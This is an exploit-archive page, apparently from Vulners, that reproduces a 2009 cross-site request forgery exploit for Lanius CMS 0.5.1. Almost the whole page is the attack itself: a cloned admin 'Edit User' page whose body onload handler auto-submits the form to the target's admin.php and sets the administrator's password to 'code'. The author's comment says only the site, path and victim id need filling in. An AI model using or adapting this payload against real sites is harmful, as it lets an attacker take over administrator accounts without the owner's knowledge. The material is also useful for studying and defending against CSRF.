Vulners
Lucene search
Lanius CMS 0.5.1 XSRF
`[-]Lanius CMS 0.5.1 CSRF vulnerability
[-]exploit found by d14l and marcoj
[-]greetz to soul,stefo,sp1r1t,invisible,kisobran and others
[-] lanius CMS suffers from csrf vulnerabilities which allows attacker change admins password
it is only important to change in source [site],[path] and [id] of victim and it will change victims password to "code"
//////////////////////////////////////////////////CODE///////////////////////////////////////////////////////////////////////////
<script type="text/javascript" language="javascript" src="http://[site]/[path]/admin/includes/js/anthill.js"></script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
var lcms_data_form='adminform';
/* ]]> */
</script>
<script type="text/javascript" language="javascript" src="includes/js/progressbar.js"></script>
<script type="text/javascript" language="javascript" src="includes/js/passwordquality.js"></script>
<link href="includes/css/progressbar.css" rel="stylesheet" type="text/css" media="all" />
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
function _init_pwd_box() {
initQualityMeter("user_password", "the_password", "Password quality: ");
}
pb_addEvent(window, "load", _init_pwd_box);
/* ]]> */
</script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
var dil_folder = 'media/forum/avatars/';
var dil_default_src = 'media/forum/avatars/default.png';
function changeImage(srcObj,srcListName) {
var im=document.getElementById("image_"+srcListName);
var obj_v = srcObj.value;
if (obj_v==null || obj_v=="") im.src = dil_default_src;
else im.src = dil_folder+obj_v;
}
/* ]]> */
</script>
<script type="text/javascript" language="javascript" src="components/forum/forum.js"></script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
function ui_lcms_st(pressbutton){
var frm=document.getElementById(lcms_data_form);
if ( pressbutton == 'save' ) {
var frm=document.getElementById('adminform');
field_value=frm.user_name.value;
if (!field_value.length) { alert("Invalid value for\n\nDisplay name");return false;
}
field_value=frm.user_user.value;
if (!field_value.length) { alert("Invalid value for\n\nUsername");return false;
}
field_value=frm.user_email.value;
if (!field_value.length) { alert("Invalid value for\n\nEmail");return false;
}
} if ( pressbutton == 'cancel' ) {
document.location.href=frm.action; return;}
lcms_st(pressbutton);
}
/* ]]> */
</script>
<script language="javascript" type="text/javascript">
var cmThemeDefaultBase = "admin/templates/default/images/";
</script>
<script language="javascript" src="admin/templates/default/js/JSCookMenu.js" type="text/javascript"></script>
<script language="javascript" src="index2.php?option=service&service=admin_menu&no_html=1&lang=en" type="text/javascript"></script>
<script language="javascript" src="admin/templates/default/js/ThemeDefault/theme.js" type="text/javascript"></script>
<link rel="stylesheet" href="admin/templates/default/js/ThemeDefault/theme.css" type="text/css" /><script language="javascript" src="admin/includes/js/dhtml.js" type="text/javascript"></script>
<link rel="stylesheet" href="admin/templates/default/css/template.style.css" type="text/css" />
</head>
<body>
<body onload="ui_lcms_st('save');">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="320" class="top-logo" >
<img src="admin/templates/default/images/header.png" alt="Administration" />
</td>
<td width="240" class="top-update" >
<a class="dlinks" title="Information about the latest version available, click to start the automatic update wizard" href="http://[site]/[path]/admin.php?com_option=system&option=autoupdate"><img border="0" src="http://www.laniuscms.org/services/status.png.php?v=0.5.1+r843" alt="Information about the latest version available, click to start the automatic update wizard" /></a>
</td>
<td align="right" class="top-logo" ><a href="index.php?option=login&task=logout" class="wlink" style="color: #e5e5e5"><img src="admin/templates/default/images/logout.png" border="0" alt="" /> Logout</a> </td>
</tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr class="toolmenu">
<td height="25"><div id="myMenuID" style="margin-left: 15px;"></div>
<script language="javascript" type="text/javascript">
cmDraw ("myMenuID", myMenu, "hbr", cmThemeDefault, "ThemeDefault");
</script>
<noscript><big>Your browser does not have javascript support, please enable it or either ask the administrator to enable a non-javascript menu</big></noscript></td>
<td align="right">
<table class="hotlinks" border="0" cellspacing="0" cellpadding="2">
<tr><td> </td>
</tr>
</table>
</td>
<td align="right"></td>
</tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0">
<tr><td class="pathway-backend"><a title="Home page" href="http://[site]/[path]/admin.php" class="pathway"><img src="media/common/home.png" border="0" alt="Home page" /></a> Edit User <a title="Permanent link to this page" href="http://[site]/[path]/admin.php?com_option=user&task=edit&cid[]=[id]"><img src="media/common/box.png" border="0" alt="Permanent link to this page" /></a> </td>
</tr>
</table>
<div class="dka_component">
<form id='adminform' name='adminform' method='post' action='http://[site]/[path]/admin.php?com_option=user' enctype='multipart/form-data'><div class="toolbar-header"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" />
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" />
<noscript>
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>
<select name="alt_task[]">
<option value="">--</option>
<option value="save">Save</option>
<option value="cancel">Cancel</option>
</select>
<input type="submit" value="Go" /></noscript>
</div><table border='0' cellpadding='0' cellspacing='0' width='100%' align='center'>
<tr><td colspan='2' class="" ><input type="hidden" name="task" value="" /></td></tr>
<tr><td colspan='2' class="header1" >Edit User</td></tr>
<tr><td colspan="2">
<table width="100%" border="0" cellpadding="5" cellspacing="2" >
<tr><td class="tabtitle">Edit User </td></tr><tr>
<td class="tabbody">
<table width="90%" border="0" align="center" cellpadding="2" cellspacing="0">
<tr><td width="200"> </td><td> </td></tr>
<tr><td colspan='2' class="" ><input type="hidden" name="user_id" value="244" /></td></tr>
<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Display name</td><td class="" ><input type="text" name="user_name" value="Webaaaaamaster" class="tf" size="40" /></td></tr>
<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Username</td><td class="" ><input type="text" name="user_user" value="admin" class="tf" size="40" /></td></tr>
<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Email</td><td class="" ><input type="text" name="user_email" value="[email protected]" class="tf" size="40" /></td></tr>
<tr><td class="" valign="top" nowrap="nowrap"> Language</td><td class="" ><select name="user_lang" class="tf">
<option value="" selected="selected" style="color: grey">-- Auto --</option>
<option value="en">English</option>
</select>
</td></tr>
<tr><td class="" valign="top" nowrap="nowrap"> User timezone</td><td class="" ><select name="user_tz" class="tf">
<option value="">-- Auto --</option>
<option value="Africa/Abidjan">Africa/Abidjan</option>
</select>
</td></tr>
<tr><td class="" valign="top" nowrap="nowrap"> Users Group</td><td class="" ><select name="user_gid" class="tf">
<option value="1">Registered</option>
<option value="2">Editor</option>
<option value="3">Publisher</option>
<option value="4">Manager</option>
<option value="5" selected="selected" style="color: grey">Administrator</option>
</select>
</td></tr>
<tr><td colspan='2' class="" > </td></tr>
<tr><td colspan='2' class="" > Leave the password field empty to preserve the previous password</td></tr>
<tr><td class="" valign="top" nowrap="nowrap"> Password</td><td class="" ><input type="password" name='user_password' value='code' class="tf" size='40' onkeypress="updateQualityMeter(this)" /></td></tr>
<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><div id="the_password"></div></td></tr>
<tr><td class="" valign="top" nowrap="nowrap"> Password confirmation</td><td class="" ><input type="password" name='user_password1' value='code' class="tf" size='40' /></td></tr>
<tr><td colspan='2' class="" > </td></tr>
<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><label for="user_message_allow">
<input id="user_message_allow" name="user_message_allow" type="checkbox" />Allow other users to send messages to me (email will not be visible to them)</label><br /><label for="user_message_show_email">
<input id="user_message_html" name="user_message_html" type="checkbox" />Can receive HTML emails</label><br /><label for="user_message_attach">
<input id="user_message_attach" name="user_message_attach" type="checkbox" checked="checked"/>Receive also attachments</label><br />
<div class="dk_content"><h3>Avatar</h3><table border="0" cellspacing="0" cellpadding="0"><tr>
<td><select name='user_avatar' class="tf" size='6' onchange='javascript:changeImage(this,"user_avatar")' >
<option value="default.png" selected='selected' >< Current ></option>
<option value="abstract8.png" >abstract8.png</option>
</select></td>
<td><img src="media/forum/avatars/default.png" id="image_user_avatar" name="image_user_avatar" border="2" alt="" /></td>
</tr></table>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
var tmpi_0 = new Image();
tmpi_0.src="media/forum/avatars/default.png";
/* ]]> */
</script>
</div>
<div class="dk_content"><input type="hidden" name="MAX_FILE_SIZE" value="614400" />
<input id="user_uploaded_avatar" name="user_uploaded_avatar" type="file" class="dk_inputbox" value="" size="45" /></div>
<div class="dk_content">
<h3>Forum user statistics</h3>Posts: 1<br />Member since 09 February 2009 19:10</div>
<p><h3>Forum user information</h3></p>
<div class="dk_content">Location: <input class="dk_inputbox" type="text" name="user_location" size="40" maxlength="100" value="" /></div>
<div class="dk_content">Website: <input class="dk_inputbox" type="text" name="user_url" size="40" value="" /></div>
<table border="0">
<tr>
<td valign="top"> </td>
<td><a href='javascript:DoPrompt("user_information", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_information", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_information", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>
</td>
</tr>
<tr>
<td valign="top">User provided information (max 1024 characters)</td>
<td><textarea name="user_information" cols="30" rows="16" class="dk_inputbox" id="user_information"></textarea></td>
</tr> <tr>
<td valign="top"> </td>
<td><a href='javascript:DoPrompt("user_signature", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_signature", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_signature", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>
</td>
</tr>
<tr>
<td valign="top">Custom signature (max 300 characters)</td>
<td><textarea name="user_signature" cols="30" rows="3" class="dk_inputbox" id="user_signature"></textarea></td>
</tr> </table></td></tr>
</table></td></tr></table>
</td></tr>
</table><br /><div class="toolbar-footer" style="text-align: left"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" />
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" />
<noscript>
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>
<select name="alt_task[]">
<option value="">--</option>
<option value="save">Save</option>
<option value="cancel">Cancel</option>
</select>
<input type="submit" value="Go" /></noscript>
</div></form></div>
<div class="footer">
<div title="Donate now EUR 10 for the Lanius CMS Project" align="center">
<form id="_xclick" name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">
<input name="cmd" value="_xclick" type="hidden" />
<input name="business" value="[email protected]" type="hidden" />
<input name="no_shipping" value="0" type="hidden" />
<input name="lc" value="EN" type="hidden" />
<input name="item_name" value="Lanius CMS Project donation from website" type="hidden" />
<input name="currency_code" value="EUR" type="hidden" />
<input name="amount" value="10.00" type="hidden" />
Support the Lanius CMS Project with a small donation:
<input src="media/common/donate.png" name="submit" alt="Lanius CMS Project donation from website" type="image" />
</form>
</div>
</div>
</body>
</html>
////////////////////////////////////////////end of code////////////////////////////////////////////////`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Feb 2009 00:00Current
0.1Low risk
Vulners AI Score0.1